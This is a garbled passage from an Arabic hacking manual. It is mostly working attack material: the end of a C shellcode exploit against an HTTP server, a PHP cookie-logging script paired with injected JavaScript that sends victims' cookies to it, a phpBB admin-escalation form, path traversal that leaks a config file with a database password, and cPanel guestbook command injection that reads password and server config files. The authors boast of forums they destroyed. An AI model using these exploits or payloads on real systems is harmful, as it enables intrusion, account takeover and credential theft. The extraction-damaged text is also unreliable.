victim.retaddr = 0x80a0000;<br />
victim.delta = -150;<br />
victim.repretaddr = 6;<br />
victim.repzero = 36;<br />
break;<br />
case \\'o\\':<br />
victim.type = \\\"OpenBSD\\\";<br />
victim.retaddr = 0x80000;<br />
victim.delta = -146;<br />
victim.repretaddr = 6;<br />
victim.repzero = 36;<br />
break;<br />
case \\'n\\':<br />
victim.type = \\\"NetBSD\\\";<br />
victim.retaddr = 0x080e0000;<br />
victim.delta = -90;<br />
٢٢٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
victim.repretaddr = 5;<br />
victim.repzero = 42;<br />
break;<br />
default:<br />
printf(\\\"[-] Better luck next time!\\\\n\\\");<br />
break;<br />
}<br />
break;<br />
/* optional stuff */<br />
case \\'w\\':<br />
sc_timeout = atoi(optarg);<br />
printf(\\\"Waiting maximum %d seconds for replies from<br />
shellcode\\\\n\\\", sc_timeout);<br />
break;<br />
case \\'c\\':<br />
cmdz = optarg;<br />
break;<br />
default:<br />
usage();<br />
break;<br />
}<br />
}<br />
if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {<br />
printf(\\\"[-] In<strong>com</strong>plete target. At least 1 argument is missing (nmap<br />
style!!)\\\\n\\\");<br />
return -1;<br />
}<br />
printf(\\\"[*] Resolving target host.. \\\");<br />
fflush(stdout);<br />
he = gethostbyname(hostp);<br />
if(he)<br />
memcpy(&ia.s_addr, he->h_addr, 4);<br />
else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {<br />
printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp);<br />
return -1;<br />
}<br />
٢٢٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
printf(\\\"%s\\\\n\\\", inet_ntoa(ia));<br />
srand(getpid());<br />
signal(SIGPIPE, SIG_IGN);<br />
for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {<br />
/* skip invalid return adresses */<br />
if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))<br />
continue;<br />
sock = socket(PF_INET, SOCK_STREAM, 0);<br />
sin.sin_family = PF_INET;<br />
sin.sin_addr.s_addr = ia.s_addr;<br />
sin.sin_port = htons(atoi(portp));<br />
if(!progress)<br />
printf(\\\"[*] Connecting.. \\\");<br />
fflush(stdout);<br />
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {<br />
perror(\\\"connect()\\\");<br />
exit(1);<br />
}<br />
if(!progress)<br />
printf(\\\"connected!\\\\n\\\");<br />
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *<br />
REP_SHELLCODE)<br />
+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero<br />
+ 1024) * REP_POPULATOR));<br />
PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM<br />
\\\"\\\\r\\\\n\\\");<br />
for (i = 0; i < REP_SHELLCODE; i++) {<br />
PUT_STRING(\\\"X-\\\");<br />
PUT_BYTES(PADSIZE_3, PADDING_3);<br />
PUT_STRING(\\\": \\\");<br />
PUT_BYTES(NOPCOUNT, NOP);<br />
٢٢٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
memcpy(p, shellcode, sizeof(shellcode) - 1);<br />
p += sizeof(shellcode) - 1;<br />
PUT_STRING(\\\"\\\\r\\\\n\\\");<br />
}<br />
for (i = 0; i < REP_POPULATOR; i++) {<br />
PUT_STRING(\\\"X-\\\");<br />
PUT_BYTES(PADSIZE_1, PADDING_1);<br />
PUT_STRING(\\\": \\\");<br />
for (j = 0; j < victim.repretaddr; j++) {<br />
*p++ = victim.retaddr & 0xff;<br />
*p++ = (victim.retaddr >> 8) & 0xff;<br />
*p++ = (victim.retaddr >> 16) & 0xff;<br />
*p++ = (victim.retaddr >> 24) & 0xff;<br />
}<br />
PUT_BYTES(victim.repzero, 0);<br />
PUT_STRING(\\\"\\\\r\\\\n\\\");<br />
}<br />
PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");<br />
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);<br />
PUT_STRING(buf);<br />
PUT_BYTES(PADSIZE_2, PADDING_2);<br />
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta);<br />
PUT_STRING(buf);<br />
if(!shown_length) {<br />
printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p -<br />
expbuf));<br />
shown_length = 1;<br />
}<br />
write(sock, expbuf, p - expbuf);<br />
progress++;<br />
if((progress%70) == 0)<br />
progress = 1;<br />
if(progress == 1) {<br />
printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr);<br />
for(i = 0; i < 40; i ++)<br />
٢٣٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
printf(\\\" \\\");<br />
printf(\\\"\\\\n\\\");<br />
if(bruteforce)<br />
putchar(\\';\\');<br />
}<br />
else<br />
putchar(((rand()>>8)%2)? \\'P\\': \\'p\\');<br />
fflush(stdout);<br />
responses = 0;<br />
while (1) {<br />
fd_set fds;<br />
int n;<br />
struct timeval tv;<br />
tv.tv_sec = sc_timeout;<br />
tv.tv_usec = 0;<br />
FD_ZERO(&fds);<br />
FD_SET(0, &fds);<br />
FD_SET(sock, &fds);<br />
memset(buf, 0, sizeof(buf));<br />
if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {<br />
if(FD_ISSET(sock, &fds)) {<br />
if((n = read(sock, buf, sizeof(buf) - 1)) < 0)<br />
break;<br />
if(n >= 1)<br />
{<br />
if(!owned)<br />
{<br />
for(i = 0; i < n; i ++)<br />
if(buf[i] == \\'G\\')<br />
responses ++;<br />
else<br />
responses = 0;<br />
if(responses >= 2)<br />
{<br />
owned = 1;<br />
write(sock, \\\"O\\\", 1);<br />
٢٣<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
write(sock, cmdz, strlen(cmdz));<br />
printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,<br />
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,<br />
victim.retaddr, victim.repretaddr, victim.repzero);<br />
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen<br />
now: \\\");<br />
fflush(stdout);<br />
}<br />
} else<br />
write(1, buf, n);<br />
}<br />
}<br />
if(FD_ISSET(0, &fds)) {<br />
if((n = read(0, buf, sizeof(buf) - 1)) < 0)<br />
exit(1);<br />
write(sock, buf, n);<br />
}<br />
}<br />
if(!owned)<br />
break;<br />
}<br />
free(expbuf);<br />
close(sock);<br />
if(owned)<br />
return 0;<br />
if(!bruteforce) {<br />
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");<br />
return -1;<br />
}<br />
}<br />
return 0;<br />
}<br />
٢٣٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
((قدتمتجریبها وإختبارها منقبل angels-bytes.<strong>com</strong>قبلوضعهالكم هنا ))<br />
وهذي وصلةتنزیلالبرنامج<br />
http://www.angels-bytes.<strong>com</strong>/?show=tools&action=info&id=19<br />
.....<br />
٢٣٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
اختراق المنتدیات من نوع<br />
" vBulletin2,2,0<br />
$$$$$$<br />
من قول<br />
$$$$$$<br />
---------<br />
:<br />
---------<br />
مقدمة<br />
الموضوع :اختراق ال vBulletin<br />
تركیب سیرفر على جهازكالشخصي) + متصفحانترنت(<br />
المتطلبات<br />
المستوى<br />
اكسبلورر) .<br />
) WebServer :<br />
: متوسط<br />
ملاحظة : هذهالطریقةلس تلل vBulletinفقط !!یمكنانتجربها علىانواعاخرى من المنتدیات<br />
.<br />
----------<br />
:<br />
----------<br />
الثغرة<br />
تنقسم طریقةالعملالى عدةاقسام ..أولا بع ضالسكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل<br />
المنتدى یستقبل<br />
بیانات من مكان خاطيء ..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML<br />
قم بكتابة موضو ع جدیداو رد<br />
هذا الكود<br />
(في منتد ى یدعمال ( HTML ..ثم اكتباي موضو ع والص قبینالسطور<br />
:<br />
script>document.write('<br />
';
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<strong>١</strong>٠<strong>١</strong>٢٤٤٤٠٦٤=[٢٠ ؛% bblastvi ٢٠<br />
sit=1011983161<br />
فكرقلیلاالان ..این الباسورد ؟؟<br />
الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ..اذن مالحل ؟<br />
قمبنسخالكود الذي وجدته والصقهفيالمتصفح ..بهذا الشكل<br />
http://www.victim.<strong>com</strong>/<strong>vb</strong>/index.php?bbuserid=[userid]&bbpassword=[<br />
[password hash<br />
ستجد عبارة : "أهلا بعودتك یا (اسمالذي سرقت منهالكوكیز....) "<br />
في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت منهالكوكیز) ..<br />
لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ..اذهبالى التحكم) وقم بتعدیلا لبریدالالكتروني<br />
الىبریدك الخا ص وثمقم بتسجیلالخروج<br />
تستطیعاستقبالبرید یحتويباسوردالادمن<br />
)<br />
)<br />
..ثماذهب الىاداة .. Forgot Password وعندها<br />
..<br />
اعتقدانكتعلم ما یجبانتفعله بعد ذلك !!ادخلالىلوحة التحكم وافعل ماتشاء<br />
! ..<br />
------------<br />
- :<br />
-----------<br />
الحل<br />
للحمایة من هذه الثغرةقمباغلاقال HTMLفي ) المنتد ى +الرسائلالخاصة +التواقیع +التقویم + ...<br />
(<br />
(واي منفذ یمكن من خلاله وضعكود HTMLباي صورةكانت (<br />
كما یجبا غلاكودال IMG ..لانه ببساطةبامكانكاستخدامهبدلكلمة فاذا وضعت <br />
او او<br />
ايكلمةاخر ىفانه سیتمتنفیذالسكرب تبشكلاوباخر ...لذاكن حذرا واغلق هذهالمنافذ<br />
.<br />
. Be Secret .. Dont' be Lamer<br />
تاریخاكتشا فالثغرة<br />
تمتجربتها علىالاصدار<br />
٢٠٠٢- <strong>١</strong> - ٣<strong>١</strong> :<br />
٢٫٢٫٠ وهيتعملبنجاح ....<br />
٢٣٥
hi_HaCkEr & MaXhAk2000<br />
" vBulletin<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
ثغرة في منتدیات2,2,9<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$$$$$$$<br />
<br />
$$$$$$$$$$$$$$$$<br />
الكاتب: لا <br />
ر د<br />
هذه الثغرة خطیرة جداوتؤديبحایة المنتدیا ت....2.2.9 vBulletin<br />
المهم شرحهاكالتالي :<br />
<strong>١</strong> -انسخالكود واحفظهبالمفكرةبامتدادphp<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
Print ($Footer);<br />
*/<br />
Switch ($HTTP_GET_VARS['Action']) {<br />
Case "Log":<br />
$Data = $HTTP_GET_VARS['Cookie'];<br />
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex<br />
(MD5 (NULL))))));<br />
$Log = FOpen ($LogFile, "a+");<br />
FWrite ($Log, Trim ($Data) . "\n");<br />
FClose ($Log);<br />
Print ("");<br />
Break;<br />
Case "List":<br />
If (!File_Exists ($LogFile) || !In_Array ($Records)) {<br />
Print ("There are No Records");<br />
Exit ();<br />
}<br />
Else {<br />
Print ("");<br />
$Records = Array_UniQue (File ($LogFile));<br />
Print ("");<br />
Print (".:: Statics\n");<br />
Print ("\n");<br />
Print ("o Logged Records : " . Count (File ($LogFile)) . "\n");<br />
Print ("o Listed Records : " . Count ($Records) . " [Not<br />
Counting Duplicates]\n");<br />
Print ("\n");<br />
Print (".:: Options\n");<br />
Print ("\n");<br />
If (Count (File ($LogFile)) > 0) {<br />
$Link['Download'] = "[Download]";<br />
}<br />
Else{<br />
$Link['Download'] = "[No Records in Log]";<br />
}<br />
Print ("o Download Log : " . $Link['Download'] . "\n");<br />
٢٣٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
Print ("o Clear Records : [Y]\n");<br />
Print ("\n");<br />
Print (".:: Records\n");<br />
Print ("\n");<br />
While (List ($Line[0], $Line[1]) = Each ($Records)) {<br />
Print ("" . $Line[0] . ": " . $Line[1]);<br />
}<br />
}<br />
Print ("");<br />
Break;<br />
Case "Delete":<br />
@UnLink ($LogFile);<br />
Print ("Deleted Succsesfuly") Or Die<br />
("Error: Cannot Delete Log");<br />
Print ("");<br />
Break;<br />
}<br />
?><br />
-٢<br />
ارفع الملفلموقع یدعم php<br />
اجعلالض حیة یضغط على هذا اللینك<br />
member2.php?s=[Session]&action=viewsubscription&perpage=[Script<br />
Code]<br />
واستبدال[code [script<br />
بهذا<br />
location='Http://[ مكان المل فالذيتمتحمیله<br />
] ?Action=Log&Cookie='+(document.cookie);<br />
4-<br />
إ ذهبألى هذا العنوان<br />
مكان/ المل فالذيتمتحمیلهAction=List? http://%20<br />
-٣<br />
....<br />
٢٣٨
hi_HaCkEr & MaXhAk2000<br />
" phpbb 2.0.0<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
اختراق منتدیات<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
$$$$$$$$$<br />
من ق ول<br />
$$$$$$$$$<br />
phpbb 2.0.0<br />
وهو شبیهبال <strong>vb</strong><br />
وهو سهل جدابل یعتبرتاافه<br />
یاالله سموباالله<br />
PhpBB2<br />
في ملف admin_ug_auth.php<br />
الوصف :<br />
یمكنك من خلال هذهالثغرةأنتأخذتصریح بأنتكون مدیر والمشر ف العام علىالمنتدى<br />
وبذلك یمكنك الدخولالىلوحةالتحكم متى شئ ت<br />
الأصدار :<br />
٢٫٠٫٠<br />
لتجربة الثغرةاولا سجلبالمنتدى<br />
ثماحفظ رقم عضویتكبالمنتدى<br />
بعدهاافتح المفكرة وانسخ مایليالیها<br />
<br />
<br />
<br />
<br />
method="post" form><br />
action="http://www.domain_name/board_directory/admin/admin_ug_au<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
<br />
<br />
<br />
عدل هذاالعنوانالى عنوان الموقع المستهد ف<br />
http://www.domain_name/board_directory<br />
اخفظهبامتدادhtml<br />
عندماتدخل الىالصفحةالتيقمتبحفظها سو فتجد<br />
قائمة والتيیتماختیارالتصریحالذيتریده لتطبیقالثغرةاخترتصریح<br />
ثمبالمربع الجانبي شع رقم عضویتكبالمنتدى<br />
أضغط زر<br />
بعدها سو فتاتیك شاشةتسجیلالدخول ضعاسمالمستخدم وكلمة المرورالخاصةبك<br />
ثم سو فتجد نفسكفيلوحةتحكمالمنتدى !!أفعل ماتریدالمنتد ى منتداك<br />
وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقولبستعرفو ما حبی تانزلهالا وعلیهتطبیق<br />
Administrator<br />
submit<br />
شووفوو المنتدا ذا<br />
http://forums.xos.ca/<br />
تدمر والحمد الله عقبالالمواقعالبااقیه...<br />
٢٤٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"ثغرة جمیلة في<br />
php في المواقع<br />
"<br />
!!!<br />
"powered by wihphoto"<br />
http://www.*****.<strong>com</strong>/wihphoto/index.php<br />
$$$$$$$$$$$$$$$$<br />
الكاتب MaXhAk2000:<br />
$$$$$$$$$$$$$$$$<br />
تعتبر هذهالثغرة جمیله ومیسره وسهله جدا وهيتعتمد على البح ثالعشوائي وهي متوفرهفياغلب<br />
المواقع المستهدفه...<br />
بسماالله نبدأ،،،<br />
مهمتناالأساسیةفي هذهالثغرهالبحثقي جوجلاوفيأي محركبحثاخر<br />
سو ف نب حث عنكلمه وسینتجلنا عددكبیییییییر من المواقعالمصابهبها<br />
سو ف یجدلنا مواقعكثیراخترأي واحد منها<br />
اذهبالى جوجل واكتب<br />
بعد ذلك علیك<br />
بحذ ف التالي من عنوانالموقع<br />
سو ف نقومبحذ ف هذه الكلمه index.php ونسبدلهابهذاالعنوان<br />
sendphoto.php?album=..&pic=config.inc.php<br />
سو فتظهرلنا صفحه یطلبفیهاادخالالبریدالذيتریدارسال مل ف الكونفجله .. اكتببرید مثلا<br />
maxhak2000@hotmail.<strong>com</strong><br />
انتظر ذواني سو فتصلك رساله ستجدفیها ملف مرفقاضغط علیه وشغله ### راح یجیككلاامكثیر<br />
الشيءالي راح نستفید منه اكثر شيءهو هذا<br />
// MySQL-DB Einstellungen<br />
// ======================<br />
$database = "usr_web1_5"; //MySQL Datenbankname<br />
اسمقاعدة > عنوانقاع البیانات )<br />
$sqluser = "web1"; //MySQL Username<br />
$sqlpass = "q+q27rym"; //MySQL Passwort<br />
اسمالمستخدم
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
اوكيالآ ن جبناالمعلوماتالي نحتاجهاكلهااليباقي علینا دحین ندخل علىقاعدةالبیاناتاو ندخل على<br />
الصورللدخول علىالصورنتبعالینكالتالي::<br />
....<br />
http://www.*****.<strong>com</strong>/wihphoto/admin.php<br />
....<br />
ونضعالباسورد حق مدیرقاعدةالبیانات ونعدلفيالصور زي مانبغى<br />
هناك بع ضالأشخا صالذین یردیدونامتلاكالموقعكاملااواختراقهكاملا هناك بع ضالطرقلفعل ذلك<br />
:::<br />
أولا/ادخل عن طریقالأ فتيبي FTP وندخل الباسورد حقالمدیر واسمالمستخدم مو حقالصور<br />
بع ضالأحیانتنجحاذاكان الأسم والباسورد مطاب قللباسورد حق مل فالكونفج.<br />
ثانیا/ عن طریقالدخوللقاعدةالبیانات والعبفیها وامتلاك الموقع عن طریقها هناكبرامجتستطیع من<br />
خلالها الدخول علىقاعدةالبیانات مثلبرنامج MySQL Front وهوبرنامج جیدأو عن طریق<br />
الأكسس وغیرها منالطریق والبرامج<br />
٢٤٢
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
ثغرة في<br />
" php nuke<br />
"<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$<br />
الكاتب: ایسر<br />
$$$$$$$$<br />
فیهثغرهفيال php nuke<br />
مكانالصورهالشخصیه .......<br />
حبیتاقولكم علیها<br />
.. الثغره دي تتیحلكتنفیذاكوادالهتمل والجافابدل<br />
-<br />
!!!<br />
انا عار فانكماول ماتقرواالسطر الاولاكیدا غلبكم حیشتمنيباكثرالالفاظاباحه -بس عاديانا متعود<br />
و یقولایه دهباههو مدخلنا هنا عشان یقولناتنفیذ اكواد هتمل و جافابدلالصورهالشخصیه ؟؟؟!!!!بس<br />
؟؟؟!!!اما عبیطاوي<br />
لكنفياخرالموضو ع حقولكم ممكنتعملوابیهاایه<br />
.....<br />
المهمان الثغرهكالتالي<br />
ساحاولانياعمل زي مواقع السیكیوریتيالمحترمهلمتیجيتعر ضثغره<br />
(<br />
) :<br />
الاصداراتالمصابه<br />
PHP Nuke versionh 6.0 والاقل منها<br />
الاستخدام<br />
:<br />
:<br />
تستخدمكماقلتفيتنفیذ اكواد الهتمل والجافا سكریب ت من خلال مكان صورهمالشخصیه.<br />
ملخ ص عامللثغره:<br />
..<br />
اي مستخدم عندم یقومبالتسجیلفيالمجلهفانه یطالبباختیار صوره شخصیه و ذلك من خلال مجموعه<br />
منالصورالموجودهفيالمجلد هذا.... /images/forum/avatars<br />
عندئذتقوم المجلهبوضعاسمالصورهفيالداتابیز .. ولكنها لاتقومبوضعايكودايانهاذااستطا ع<br />
اي یوزران ی حصل علىكودفورم المجله واستطا عان یغیر صندوقاختیارالصورهالشخصیهالى<br />
صندوق text عادي اذناعتقدانه ممكنان یكتبكود الهتمل اللي هوه عایزه<br />
الاكسبلویت:<br />
اولا علیك نتقومبالتسجیلفيالمجله والدخول بعد ذلك والذهابالى صفحه Your Account و منها<br />
الذهاب الى صفحه Your Info بعد ذلك علیكباظهار سورسكودالصفحه من خلال view source و<br />
الب حث عنكلمهuid<br />
لازمتلاقي حاجه زيكده<br />
!!!!<br />
<br />
:<br />
٢٤٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
كده یبقىانت عرفت رقمالاي دي اللي هوهفي المثالكان ... ٢<strong>١</strong><strong>١</strong><strong>١</strong><br />
علیك بعد ذلك نكتحفظالكود دهفيالنوتباد وتسمیه<br />
http://nukesite/ الى عنوان المجلهالهد ف<br />
اياسمبامتداد html<br />
:......<br />
مع ملاحظهتغییر<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
خليبالكانفیه مسافه بعدالعلامه<br />
"
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
" ثغره في Bandmin 1.4<br />
$$$$$$$$$$$$<br />
الكاتب : حزمالظامي<br />
$$$$$$$$$$$$<br />
بسماالله الرحمن الرحیم.<br />
(( cPanel exploit not being fixed ))<br />
الحقیقة البدایة هذهالثغرهتم اكتشافها من مدة وقدتناقشتها معأخيالحبیبهیك س منأیام وقل تانشرها<br />
منباب الفائدة ولیحذراصحابالمواقع منها ...<br />
الثغره هيفي مدیر الباندویث<br />
المخاطر الجدیدة من سيبانل<br />
وهذه البرنامجیعطیكتفاصیل وإ حصائیات شهریة ...یمكن عن طریقهمعرفة جمیع المواقع على الخادم<br />
أیضاً ویمكنأنتستثمربطرقأخرى<br />
) 1.4 ( Bandmin وهيثغره سيبانلكمااعتدنا هذهالایام على<br />
...<br />
عموماإذاتریدتنفذالثغرهفهذا مثاللها ...<br />
http://yourdomain.con/bandwidth/<br />
وطریقةإغلاقالثغرهكالتالي :<br />
وبكلاختصار ضع مل ف ) .htaccess )في هذاالفولدر...<br />
/usr/local/bandmin/htdocs<br />
وإلیكم هذهالتفاصیل عن هذهالثغره......<br />
*************************<br />
Notice:<br />
Any Resellers or Dedicated hosts that use cPanel you should be aware<br />
that there is still an exploit people are using to see what domains are<br />
hosted on the server.<br />
If you have cPanel/WHM on your server, just go to your domain and put<br />
Hopefully you http://yourdomain.con/bandwidth//bandwidth/ after it.<br />
will get a “ You don't have permission to access /bandwidth/ on this<br />
server” message or it will ask for a password.<br />
Otherwise you will be at a page titled “ Bandmin 1.4 (what ever<br />
٢٤٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
version)” from here you can access the monthly stats with a list of all<br />
domains with over 1MB of transfer.<br />
The fix are listed below:<br />
Make a TXT file with these lines in it: Use your servers IP# for the XXX<br />
allow from xxx.xxx.xxx.xxx<br />
deny from all<br />
Name it .htaccess and place it in the servers /usr/local/bandmin/htdocs<br />
directory. This will block all but the IP that you use in the .htaccess file.<br />
*************************<br />
امافیوجدثغرةالسيبانلالتيلمیتم ذكرهالكناغلب المواقعاغلتهاالان<br />
cgi-sys/guestbook.cgi?user=cpanel&template<br />
تكتب هذا الراب ط بعداسمالموقع<br />
ولكن بعد علامة =|تكتبالامرباللینكس |<br />
لأستعرا ضباسورد موقع علىالسیرفر<br />
مثلا<br />
/cgi-sys/guestbook.cgi?user=cpanel&template=|cat<br />
/home/XXX/public_html/_vti_pvt/service.pwd|<br />
وهذاالامرلكياسهل على البع ضاستعرا ض هذاالمل ف مع ملاحظة<br />
][ lsوهواستعرا ض مابداخلالمل ف][<br />
او][html php ض صفحه داخل مل ف سواءكانت catوهواستعرا ][<br />
ترى صلاحیاتكفي رؤیة هذهالصفحه ویمكنك ذالك عن طریق هذاالامر<br />
lsهذاالامریضهرلك -al الملفات ولو جیتتقراهبالتفصیل هواستعرا ض<br />
رؤیة الملفاتالتي یسمحلكبرؤیتهالو جیتتقولكی فاقولكتعال<br />
vi ][<br />
lsهواستعرا ض al وهو یضهرلكامامكل مل ف عدتفراغا تاذاكان<br />
اولفرا غفیها ×فماتقدرتشوفه<br />
ال حینبدخل معاكمفيتفصیل مملللأمر<br />
][=========][<br />
cat /home/XXX/public_html/_vti_pvt/service.pwd<br />
٢٤٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
][<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
][<br />
][<br />
][ catزي ما ذكرنا سابقا اللي هواستعرا ضالصفحات<br />
D عباره عنقسمفي هاردیسك سیرفرلینكس زیه زي homeهو ][<br />
او Cفيالویندوز<br />
][ public_html هذا هو عباره عن مل ف موجود داخلايا فتيبي لاي موقع<br />
فيالدنیا وهذاالمل ف مهم لانه داخلهتنح طالصفحات ولاحظو<br />
انه موجودفيالسیرفركل ملفاتال public_html لكلالمواقع<br />
اللي علىالسیرفر<br />
][ _vti_pvt وهو مل ف موجودهفیه ملفاتالفرون تبیج<br />
][ service.pwd وهوالمل فالليبیفیدكفي رؤیةكلباسوردات السیرفر مع<br />
یوزراتهابس بتكون مشفره ][<br />
][<br />
][<br />
XXX ][<br />
اسم الموقعالموجود علىالسیرفروترید رؤیت مل ف<br />
الفرون تبیجفیه<br />
-----------------------<br />
وبعد وجوودالباسوردات طبعا بتلااقیها مشفره<br />
لانها عباره عن ملفا ت service.pwdلانها ملفات الفرون تبیج<br />
اذا راحتلاقي:<br />
# -FrontPageadshhhhg:T_h1rTAnSmwck<br />
advrsgrent:yTPvsh2SKGI46<br />
# -FrontPagesfjhsdlj:KH5xpD5HGFQio<br />
# -FrontPagesdfQKG0nPulR5aY<br />
# -FrontPageafsdfgrica:7njMXh9/HImTA<br />
# -FrontPageaftergsdfsgnoo:wyXqflo6kr7TI<br />
را حتلقاه زيكذاكذا عادانت وشطارتك ببرنامج جوهن ذا ریبر بتفكالتشفیر<br />
------------------------<br />
اوكيال حینبیجي واحد موسوسبیقولفي نفسه طیبانا جبت الباسوردات +الیوزرات<br />
كی فاعر فاسمالموقع<br />
اوكياقولكتعال حبیبي<br />
اكتبالامر ذا<br />
)) فعلاالوسوسهلهافایدةالیومینذي ((<br />
cat /etc/httpd/apache/conf/httpd.conf<br />
في هذا المل ف را ح یستعر ضلككلكبیره وصغیرهفيالسیرفر<br />
نبتديبشرح هذاالامر :<br />
٢ ٤٨
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
][ catتم ذكره ساااا ااابقاً][<br />
][ etc وهو عباره عن مل ف شبهامنيتخزنفیهالباسوردات وملفات<br />
اللوج والأشیاء المسموحبهافيالسیرفر<br />
][ httpd وهو مل فالمواقع الموجوده علىالسیرفر][<br />
مل ف یوجد داخلالمل فالامنيوتوجدبهمعلومات عن السیرفر<br />
ونوعه وكل شي یخت صبه<br />
][ conf وهواختصارلكلمة config وهو مل فبشكل عام یخت ص بكل ماهو<br />
سريبالموقع مثلالیوزر والباسوردللموقعاولقواعدالبیانات<br />
][ httpd.conf وهوالمل ف المطلوباللذي یوجدفیهكل شي خا صبالموقع<br />
اسمه والیوزر الخا صبه ومساحته على السیرفر وایمیل صاحبه ][<br />
][<br />
][<br />
][<br />
apache ][<br />
وهذااللي را حتلقاه<br />
PHP:<br />
ServerAlias w<br />
ww.NIGHTMARE.<strong>com</strong> NIGHTMARE.<strong>com</strong><br />
